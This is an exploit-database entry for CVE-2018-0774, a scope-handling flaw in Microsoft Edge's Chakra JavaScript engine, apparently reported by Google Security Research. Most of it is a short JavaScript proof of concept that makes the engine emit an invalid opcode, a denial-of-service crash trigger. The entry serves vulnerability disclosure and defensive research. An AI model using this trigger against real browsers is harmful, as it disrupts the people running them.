Microsoft Edge Chakra - Incorrect Scope Handling

EDB-ID: 43715
Author: Google Security Research
Published: 2018-01-17
CVE: CVE-2018-0774
Type: Dos
Platform: Windows
Aliases: N/A
Advisory/Source: Link
Tags: N/A
Vulnerable App: N/A

  
(function func(arg = function () {
print(func); // SetHasOwnLocalInClosure should be called for the param scope in the PostVisitFunction function.
}()) {
print(func);
function func() {

}
})();

// Chakra fails to distinguish whether the function is referenced in the param scope and ends up to emit an invalid opcode.

Related Posts